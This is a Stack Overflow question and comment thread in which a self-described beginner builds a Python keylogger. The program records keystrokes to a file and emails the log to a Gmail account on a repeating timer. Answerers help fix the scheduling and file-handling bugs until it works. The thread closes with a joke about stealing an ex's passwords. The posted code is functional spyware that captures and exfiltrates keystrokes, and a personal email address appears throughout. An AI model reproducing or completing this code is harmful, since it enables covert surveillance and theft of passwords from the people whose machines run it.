# Make A Python Script Do Something Every Hour

Tags: python, time

for a project I am working on a python keylogger. I have completed both the key logging module and the email module which sends the log files back to me but am  having trouble on merging them together. I would like the keylogger to send me an email including the log file every 24 hours. How could I do that?

I tried using a simple time.sleep() delay but since the keylogging module only stops when I kill it as a process it never gets to the delay because it is "infinite" you could say.

Here is my current code:

```
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import  MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders
from pynput import keyboard

#Keylogging Module
def on_press(key):
    file = open("C:\\Users\\mikur\\Desktop\\KeyLog.txt", 'a')
    file.write(str(key))
    file.close()


with keyboard.Listener(on_press=on_press) as Listener:
    Listener.join()

#Email module
email_user = 'miku.rebane@gmail.com'
email_send = 'miku.rebane@gmail.com'
subject = 'KeyLog'


msg = MIMEMultipart()
msg['From'] = email_user
msg['To']   = email_send
msg['Subject'] = subject

body = 'Log File Attached'
msg.attach(MIMEText (body, 'plain'))

filename='C:\\Users\\mikur\\Desktop\\KeyLog.txt'
attachment  =open(filename,'rb')

part = MIMEBase('application','octet-stream')
part.set_payload((attachment).read())
encoders.encode_base64(part)
part.add_header('Content-Disposition',"attachment; filename= "+filename)

msg.attach(part)
text = msg.as_string()
server = smtplib.SMTP('smtp.gmail.com',587)
server.starttls()
server.login(email_user,"mypassword")

server.sendmail(email_user,email_send,text)
server.quit()
```

Please explain answers very simply because I am an absolute beginner.

Edit: This is the new code, which unfortunetly doesn't work.

```
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import  MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders
from pynput import keyboard
import threading


def on_press(key):
    file = open("C:\\Users\\mikur\\Desktop\\KeyLog.txt", 'a')
    file.write(str(key))
    file.close()


with keyboard.Listener(on_press=on_press) as Listener:
    Listener.join()

def sendlog():
    threading.Timer(10.0, sendlog).start()
    email_user = 'miku.rebane@gmail.com'
    email_send = 'miku.rebane@gmail.com'
    subject = 'KeyLog'
    msg = MIMEMultipart()
    msg['From'] = email_user
    msg['To']   = email_send
    msg['Subject'] = subject
    body = 'Log File Attached'
    msg.attach(MIMEText (body, 'plain'))
    filename='C:\\Users\\mikur\\Desktop\\KeyLog.txt'
    attachment  =open(filename,'rb')
    part = MIMEBase('application','octet-stream')
    part.set_payload((attachment).read())
    encoders.encode_base64(part)
    part.add_header('Content-Disposition',"attachment; filename= "+filename)
    msg.attach(part)
    text = msg.as_string()
    server = smtplib.SMTP('smtp.gmail.com',587)
    server.starttls()
    server.login(email_user,"mypassword")
    server.sendmail(email_user,email_send,text)
    server.quit()


sendlog()
```

Edit 3: Re-organized the code, works but incomplete logs are sent.

```
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import  MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders
from pynput import keyboard
import threading

file = open("C:\\Users\\mikur\\Desktop\\KeyLog.txt", 'a')

 def sendlog():
    threading.Timer(10.0, sendlog).start()
    email_user = 'miku.rebane@gmail.com'
    email_send = 'miku.rebane@gmail.com'
    subject = 'KeyLog'
    msg = MIMEMultipart()
    msg['From'] = email_user
    msg['To']   = email_send
    msg['Subject'] = subject
    body = 'Log File Attached'
    msg.attach(MIMEText (body, 'plain'))
    filename='C:\\Users\\mikur\\Desktop\\KeyLog.txt'
    attachment  =open(filename,'rb')
    part = MIMEBase('application','octet-stream')
    part.set_payload((attachment).read())
    encoders.encode_base64(part)
    part.add_header('Content-Disposition',"attachment; filename= "+filename)
    msg.attach(part)
    text = msg.as_string()
    server = smtplib.SMTP('smtp.gmail.com',587)
    server.starttls()
    server.login(email_user,"password")
    server.sendmail(email_user,email_send,text)
    server.quit()


sendlog()  


#Keylogging Module
def on_press(key):
    file.write(str(key))
    file.close()


with keyboard.Listener(on_press=on_press) as Listener:
    Listener.join()
```

Edit 4: This error appears when using code form Edit 3:

```
Traceback (most recent call last):
  File "C:\Users\mikur\Desktop\keylogger testing.py", line 47, in <module>
    Listener.join()
  File "C:\Users\mikur\AppData\Local\Programs\Python\Python37-32\lib\site-packages\pynput\_util\__init__.py", line 199, in join
    six.reraise(exc_type, exc_value, exc_traceback)
  File "C:\Users\mikur\AppData\Local\Programs\Python\Python37-32\lib\site-packages\six.py", line 692, in reraise
    raise value.with_traceback(tb)
  File "C:\Users\mikur\AppData\Local\Programs\Python\Python37-32\lib\site-packages\pynput\_util\__init__.py", line 154, in inner
    return f(self, *args, **kwargs)
  File "C:\Users\mikur\AppData\Local\Programs\Python\Python37-32\lib\site-packages\pynput\keyboard\_win32.py", line 237, in _process
    self.on_press(key)
  File "C:\Users\mikur\AppData\Local\Programs\Python\Python37-32\lib\site-packages\pynput\_util\__init__.py", line 75, in inner
    if f(*args) is False:
  File "C:\Users\mikur\Desktop\keylogger testing.py", line 42, in on_press
    file.write(str(key))
ValueError: I/O operation on closed file.
```

Comment: are you open to having two different programs or atleast processes? One for logging, another for sending emails?

Comment: this is a [duplicate](https://stackoverflow.com/questions/474528/what-is-the-best-way-to-repeatedly-execute-a-function-every-x-seconds-in-python)

Comment: @AnuvratParashar I was thinking about having both in the same script to make it simpler, so one porcess.

Comment: if your main process is blocking, you will have to start another one to send the emails.

Comment: do you mean logging? (you said blocking)

Comment: A process 'blocks' when it waits for a response instead of returning. If your logging is 'blocking' then it would prevent any other processing (i.e. sending an email). I don't think it's blocking because you did get the email.

Comment: I see, I was wondering if I could instead have 2 separate py scripts and just merge them into a single exe? is that possible?

Comment: Yes. See the accepted answer here: https://stackoverflow.com/questions/21321700/15-python-scripts-into-one-executable

Answer (score 2, accepted):

As per this answer: https://stackoverflow.com/a/3393759/1910863

You can use a `threading timer`. Here is the code snippet from the linked answer:

```
import threading

def printit():
    threading.Timer(5.0, printit).start()
    print "Hello, World!"

printit()
```

You would call (or schedule) your method at the start of your script and it will re-schedule itself every time it fires.

If you like this answer, you should upvote the linked answer as he is the one that deserves the credit for it.

Comment: I still couldn't get it to work, the email was never sent. No error messages, I updated the question with the new code.

Comment: I believe it is part of python's standard library. The import should be all you need to use it.

Even the initial email isn't sent?

Comment: nope, nothing is sent. And yes I did change "mypassword" back to the actual password for the gmail account

Comment: I did some more testing, if I remove the keylogging part it works fine. sends me an email every 10 seconds like it's supposed to

Comment: Progress! So now just to figure out why the keylogging breaks it.

Comment: maybe it's because the keylogging is infinite so it never reaches the email part of the code???

Comment: Can you call `sendlog()` before you start the keylogging?

Comment: i tried that but that returns an error about how the logging file doesnt exist. So I moved the creation of the logging file above that. This did work but the logs I was sent were incomplete and only included 1 or 2 letters. Ill update the question in a sec. edit: I edited the question

Comment: It sounds like the logger isn't capturing all the key strokes. Do you know if what's in the file is the first key strokes or the last or kinda random?

Comment: seems like just the first ones.

Comment: It also also spits out a bunch of errors. I edited the question

Comment: Oh! You open the file at the very start but then close the file in `on_press(key)`.

You can't write to a file after you have closed it. That's what's throwing the IO Error.

Try not closing it in `on_press(key)`. That should fix your issue.

Comment: Where should I close it instead, after on_press() key is done?

Comment: You could open and close it on every key press. That's how you had it to begin with. Was that giving you problems?

Comment: yeah that was giving me problems, thats how I got the error on edit 4

Comment: The code in Edit 3 is opening the file at the very top, outside of `on_press(key)`. In `on_press(key)` you are writing to the file then closing it. You never reopen it. That is what is giving the I/O error in edit 4. Try placing the `file = open` command just above the `file.write` command, inside the `on_press(key)` method.

Comment: i think that worked, I ended up placing ´file = open´ right above ´def sendlog()´. And then having another file open before ´file.write´ in ´on_press´. I am going to do more testing but it seems to work, thanks.

Comment: time to steal my ex's passwords! (jk)